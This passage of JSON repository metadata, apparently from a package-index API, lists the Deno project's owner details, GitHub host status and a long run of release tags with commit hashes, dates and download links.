GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10